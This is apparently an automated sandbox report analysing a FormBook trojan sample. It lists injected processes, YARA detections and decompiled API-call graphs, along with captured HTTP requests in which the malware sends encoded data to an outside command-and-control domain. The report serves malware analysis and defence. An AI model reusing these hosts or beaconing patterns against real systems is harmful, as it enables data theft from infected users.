                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:57.244179010 CEST10896OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.donnavariedades.com
                                          Origin: http://www.donnavariedades.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.donnavariedades.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 47 77 58 4a 4c 49 32 4d 70 45 2b 43 47 30 56 38 6a 75 43 70 6e 4e 55 39 55 36 6d 39 44 63 54 47 64 4e 75 6f 78 35 5a 2f 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 4e 7a 32 74 79 6a 56 79 30 44 51 41 59 67 73 57 55 33 73 34 6e 4c 33 53 71 6d 57 77 73 56 50 4d 32 6a 48 66 56 45 64 4b 39 7a 62 38 74 4a 78 31 59 4f 74 56 34 43 63 54 78 72 4c 49 4b 64 66 59 32 31 78 4d 34 6b 4d 77 6f 34 4e 6a 51 66 [TRUNCATED]
                                          Data Ascii: elJtehkH=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPGwXJLI2MpE+CG0V8juCpnNU9U6m9DcTGdNuox5Z/WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGNz2tyjVy0DQAYgsWU3s4nL3SqmWwsVPM2jHfVEdK9zb8tJx1YOtV4CcTxrLIKdfY21xM4kMwo4NjQf5mLUs7dYW597HmQn2Tv9O4/SS2ICmeGs9hrNHcyTAPg3k+91MxjqOZ2a2PJuuy1ps7OQ5+gIx+uxkBJmhEJud9x2yRABrtsRyVR08Fzr+CHCDbNgBGU+CIVCeug6+9B/vdEJQlsy8R5HvmLN01yHdG0iVnUJVPG3MertaEZxdTKPsAiaIxW0Y/xipNj+xXWE9QGsPBIufENbWD+wI++mY6/Rkh+LanFz0nQSJMIAd3smHCrwvbjxU21E5nd19c9yuLWezgILwI//W2rMVQEsw5cKmgUQzXR9YaQzKtT0/YliykuMAvgepG1+awt3neOu8bpmz8wUNhWI1vr71WYXsDNVFuPN4Mhf5oSAgFFkYiL6rNyK78uy72eZsS60RRMnOjsFirAcVReTKZJ40MIJc9M5holShPmbgsHkZR15a6t1uVbtPs6P+gkAD83m7PdT8uyDC1cIvvLbxNaJfzgWAbje4xr5cK39uLvMsbAZL0pfWNlDbR0l8KEcrGTr8qBnOMlIXqTiYayWGiqjxdSaamLN3ntLawNFQc6eMhOS8+grAuF7LPQh5hHcNIjolRTtcaqnD6b54y3uZDjUdC/+w6sj2yL9kMZFNxPr32C4iLLkpEcWCeYu9dwRKI2uG2RAUdRHufWOk4RCHaBvB4NW6wJQaZJJU7z/So [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.44976915.197.240.20803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:59.858748913 CEST513OUTGET /fo8o/?elJtehkH=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.donnavariedades.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:43:00.311523914 CEST397INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Fri, 30 Aug 2024 07:43:00 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6c 4a 74 65 68 6b 48 3d 6c 2b 33 30 31 5a 76 49 54 43 78 61 58 39 41 41 34 6c 59 53 4b 4a 52 6d 37 53 71 48 34 74 33 4a 67 7a 63 74 4f 51 78 32 39 71 53 73 72 78 58 38 6b 77 34 39 79 6b 67 6d 75 6d 69 59 59 55 34 32 78 4d 47 78 56 69 67 35 4b 56 5a 72 4a 6f 73 50 62 73 39 70 46 41 6d 4f 64 6e 63 6b 39 66 6f 75 68 42 31 52 55 75 42 69 62 35 76 5a 6f 6a 51 6b 43 5a 43 71 4b 6b 30 3d 26 7a 38 5f 3d 67 6c 77 48 35 42 4b 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?elJtehkH=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&z8_=glwH5BKp"}</script></head></html>


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:39:04
                                          Start date:30/08/2024
                                          Path:C:\Users\user\Desktop\8htbxM8GPX.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\8htbxM8GPX.exe"
                                          Imagebase:0xf90000
                                          File size:1'244'672 bytes
                                          MD5 hash:8A854F74C740374FBD90A0D1B4C6012D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:03:39:19
                                          Start date:30/08/2024
                                          Path:C:\Windows\SysWOW64\svchost.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\8htbxM8GPX.exe"
                                          Imagebase:0x960000
                                          File size:46'504 bytes
                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:03:39:27
                                          Start date:30/08/2024
                                          Path:C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe"
                                          Imagebase:0x2d0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:6
                                          Start time:03:39:28
                                          Start date:30/08/2024
                                          Path:C:\Windows\SysWOW64\netbtugc.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                          Imagebase:0x590000
                                          File size:22'016 bytes
                                          MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:7
                                          Start time:03:39:41
                                          Start date:30/08/2024
                                          Path:C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe"
                                          Imagebase:0x2d0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:8
                                          Start time:03:39:53
                                          Start date:30/08/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6bf500000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:1.4%
                                            Dynamic/Decrypted Code Coverage:5.3%
                                            Signature Coverage:8.4%
                                            Total number of Nodes:131
                                            Total number of Limit Nodes:9
                                            execution_graph 76935 424563 76940 424572 76935->76940 76936 4245f9 76937 4245b6 76943 42d1f3 76937->76943 76940->76936 76940->76937 76941 4245f4 76940->76941 76942 42d1f3 RtlFreeHeap 76941->76942 76942->76936 76946 42b6b3 76943->76946 76945 4245c6 76947 42b6d0 76946->76947 76948 42b6e1 RtlFreeHeap 76947->76948 76948->76945 76949 42a9c3 76950 42a9e0 76949->76950 76953 3a72df0 LdrInitializeThunk 76950->76953 76951 42aa08 76953->76951 77068 42e333 77069 42d1f3 RtlFreeHeap 77068->77069 77070 42e348 77069->77070 77071 4241d3 77072 4241ef 77071->77072 77073 424217 77072->77073 77074 42422b 77072->77074 77075 42b363 NtClose 77073->77075 77076 42b363 NtClose 77074->77076 77077 424220 77075->77077 77078 424234 77076->77078 77081 42d313 RtlAllocateHeap 77078->77081 77080 42423f 77081->77080 77082 42d2d3 77085 42b663 77082->77085 77084 42d2eb 77086 42b680 77085->77086 77087 42b691 RtlAllocateHeap 77086->77087 77087->77084 76954 413e83 76955 413e9c 76954->76955 76960 417823 76955->76960 76957 413eba 76958 413f06 76957->76958 76959 413ef3 PostThreadMessageW 76957->76959 76959->76958 76961 417847 76960->76961 76962 41784e 76961->76962 76963 417893 LdrLoadDll 76961->76963 76962->76957 76963->76962 76964 41ae83 76965 41aec7 76964->76965 76966 41aee8 76965->76966 76968 42b363 76965->76968 76969 42b380 76968->76969 76970 42b391 NtClose 76969->76970 76970->76966 77088 41df93 77089 41dfb9 77088->77089 77093 41e0a7 77089->77093 77094 42e373 RtlAllocateHeap RtlFreeHeap 77089->77094 77091 41e04b 77092 42aa13 LdrInitializeThunk 77091->77092 77091->77093 77092->77093 77094->77091 76971 3a72b60 LdrInitializeThunk 77095 4189f6 77096 418a18 77095->77096 77097 4189fd 77095->77097 77098 42b363 NtClose 77096->77098 77099 418a22 77098->77099 76972 401e0b 76973 401e15 76972->76973 76976 42e793 76973->76976 76979 42cde3 76976->76979 76980 42ce09 76979->76980 76991 407603 76980->76991 76982 42ce1f 76990 401ec2 76982->76990 76994 41ac93 76982->76994 76984 42ce3e 76988 42ce53 76984->76988 77009 42b703 76984->77009 76987 42ce62 76989 42b703 ExitProcess 76987->76989 77005 427463 76988->77005 76989->76990 77012 416563 76991->77012 76993 407610 76993->76982 76995 41acbf 76994->76995 77030 41ab83 76995->77030 76998 41ad04 77001 41ad20 76998->77001 77003 42b363 NtClose 76998->77003 76999 41acec 77000 41acf7 76999->77000 77002 42b363 NtClose 76999->77002 77000->76984 77001->76984 77002->77000 77004 41ad16 77003->77004 77004->76984 77006 4274bd 77005->77006 77008 4274ca 77006->77008 77041 418373 77006->77041 77008->76987 77010 42b71d 77009->77010 77011 42b72e ExitProcess 77010->77011 77011->76988 77013 41657a 77012->77013 77015 416590 77013->77015 77016 42bd93 77013->77016 77015->76993 77018 42bdab 77016->77018 77017 42bdcf 77017->77015 77018->77017 77023 42aa13 77018->77023 77021 42d1f3 RtlFreeHeap 77022 42be37 77021->77022 77022->77015 77024 42aa30 77023->77024 77027 3a72c0a 77024->77027 77025 42aa5c 77025->77021 77028 3a72c1f LdrInitializeThunk 77027->77028 77029 3a72c11 77027->77029 77028->77025 77029->77025 77031 41ac79 77030->77031 77032 41ab9d 77030->77032 77031->76998 77031->76999 77036 42aab3 77032->77036 77035 42b363 NtClose 77035->77031 77037 42aad0 77036->77037 77040 3a735c0 LdrInitializeThunk 77037->77040 77038 41ac6d 77038->77035 77040->77038 77043 41839d 77041->77043 77042 4187fb 77042->77008 77043->77042 77049 413fb3 77043->77049 77045 418498 77045->77042 77046 42d1f3 RtlFreeHeap 77045->77046 77047 4184b0 77046->77047 77047->77042 77048 42b703 ExitProcess 77047->77048 77048->77042 77056 413fd2 77049->77056 77050 414127 77050->77045 77051 4140f0 77051->77050 77061 41afa3 RtlFreeHeap LdrInitializeThunk 77051->77061 77053 414104 77053->77050 77062 41afa3 RtlFreeHeap LdrInitializeThunk 77053->77062 77055 41411d 77055->77045 77056->77050 77056->77051 77058 413a03 77056->77058 77059 413a25 77058->77059 77063 42b5c3 77058->77063 77059->77051 77061->77053 77062->77055 77064 42b5dd 77063->77064 77067 3a72c70 LdrInitializeThunk 77064->77067 77065 42b605 77065->77059 77067->77065

                                            Executed Functions

                                            Function 00417823 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 91 417823-41783f 92 417847-41784c 91->92 93 417842 call 42def3 91->93 94 417852-417860 call 42e413 92->94 95 41784e-417851 92->95 93->92 98 417870-417881 call 42c8b3 94->98 99 417862-41786d call 42e6b3 94->99 104 417883-417897 LdrLoadDll 98->104 105 41789a-41789d 98->105 99->98 104->105
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417895
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                            • Instruction ID: 1e8b7e693d0757d8a961b4631c37392234f2aad8e762a2445afa1c6b904c5ac6
                                            • Opcode Fuzzy Hash: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                            • Instruction Fuzzy Hash: 5A0171B5E0020DABDF10EBE1DC46FDEB378AB54308F0081AAE90897241F675EB44CB95
                                            Function 0042B363 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 117 42b363-42b39f call 404c33 call 42c3f3 NtClose
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                            • Instruction ID: 45f0c5d2d851bf6a47e5c989f01d123ac51db2545ee8cab0af5865c81de9e597
                                            • Opcode Fuzzy Hash: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                            • Instruction Fuzzy Hash: F5E04F322006547BD220EA5ADC41F9B775CDFC6714F01441AFA08A7241C675791087A5
                                            Function 03A735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 134 3a735c0-3a735cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                            • Instruction ID: 8be3f98a60af97975ec109fd72819471920c05d00907bd7c21b7e5f0758742fa
                                            • Opcode Fuzzy Hash: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                            • Instruction Fuzzy Hash: 1290023160550802D100B2584554746500A87D0301FA6C412A042456CD8B998A5165B2
                                            Function 03A72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 131 3a72b60-3a72b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                            • Instruction ID: f2f3aed07c35dfcbf5890919c288cb173e9f7752dfdc21db169de1d2204c02dc
                                            • Opcode Fuzzy Hash: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                            • Instruction Fuzzy Hash: 43900261202404034105B2584454656800F87E0301B96C022E1014594DCA2989916135
                                            Function 03A72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 133 3a72df0-3a72dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                            • Instruction ID: 7e6c41b1e2a895b3658c0bbefc5c344f7b2255cc5c1d8d85d620e24d36ff4704
                                            • Opcode Fuzzy Hash: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                            • Instruction Fuzzy Hash: DB90023120140813D111B2584544747400E87D0341FD6C413A042455CD9B5A8A52A131
                                            Function 03A72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 132 3a72c70-3a72c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                            • Instruction ID: 85a7ce7d1fba9afba6edc3cc0ec763e3c3ffde9bd170bc9b91b8edcd9a3683d3
                                            • Opcode Fuzzy Hash: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                            • Instruction Fuzzy Hash: 3D90023120148C02D110B258844478A400A87D0301F9AC412A442465CD8B9989917131
                                            Function 00413D55 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 413d55-413d62 1 413d64-413d7e 0->1 2 413ceb 0->2 3 413d81-413d83 1->3 4 413d20-413d2c 2->4 5 413da0 3->5 6 413d85-413d8e 3->6 4->3 7 413d2e-413d34 4->7 10 413da2-413dac 5->10 11 413dca 5->11 8 413d90-413d9c 6->8 9 413d43-413d47 6->9 12 413d35-413d3a 7->12 8->5 15 413d48-413d4f 9->15 10->12 13 413dae-413db0 10->13 14 413dcc-413de3 11->14 12->9 16 413de5-413dee 14->16 17 413e3f-413e49 14->17 15->15 18 413d51 15->18 20 413df2-413e11 16->20 19 413e83-413ef1 call 42d293 call 42dca3 call 417823 call 404ba3 call 424663 17->19 18->4 21 413d53 18->21 36 413f13-413f18 19->36 37 413ef3-413f04 PostThreadMessageW 19->37 20->20 23 413e13-413e1c 20->23 21->0 23->14 25 413e1e-413e26 23->25 25->19 27 413e28-413e3d 25->27 27->17 37->36 38 413f06-413f10 37->38 38->36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 0-2839762430
                                            • Opcode ID: 91db4609e8833fd3a820713cf9b5a6a8e9e2ab509916083fac39da9bc8e51783
                                            • Instruction ID: c4a724d4039be3166e5acdd913666e56dc9e5e6edd7e4400ba1538f6cf135358
                                            • Opcode Fuzzy Hash: 91db4609e8833fd3a820713cf9b5a6a8e9e2ab509916083fac39da9bc8e51783
                                            • Instruction Fuzzy Hash: 8F513D72D00605ABEB11DF34D882BCABBB8EF50710F50025AE580DB287D7348A83C78D
                                            Function 00413E7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 00413F00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 1836367815-2839762430
                                            • Opcode ID: 73385b85b1a12d59d14ba7e5b01e95c766caa6edac8ddb57832a69d99dc255d8
                                            • Instruction ID: 66ec318afa1e55ac9979effac25fbd42c247622ed9ce020384db04369a2d2c0b
                                            • Opcode Fuzzy Hash: 73385b85b1a12d59d14ba7e5b01e95c766caa6edac8ddb57832a69d99dc255d8
                                            • Instruction Fuzzy Hash: 96110C71D0421876DB21AA959C42FDF7B7C9F41B14F004059FA047B2C2D6BC6B0287E9
                                            Function 00413E83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 00413F00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 1836367815-2839762430
                                            • Opcode ID: 2f3ccf5a19ea64df06ba1c4150d40991daeeed6eabb501ca3201f0468e65b513
                                            • Instruction ID: 0fee61a9f8326992331cd4047e9b78b06fc3b36c548e28b2e169e1ad3d3737a7
                                            • Opcode Fuzzy Hash: 2f3ccf5a19ea64df06ba1c4150d40991daeeed6eabb501ca3201f0468e65b513
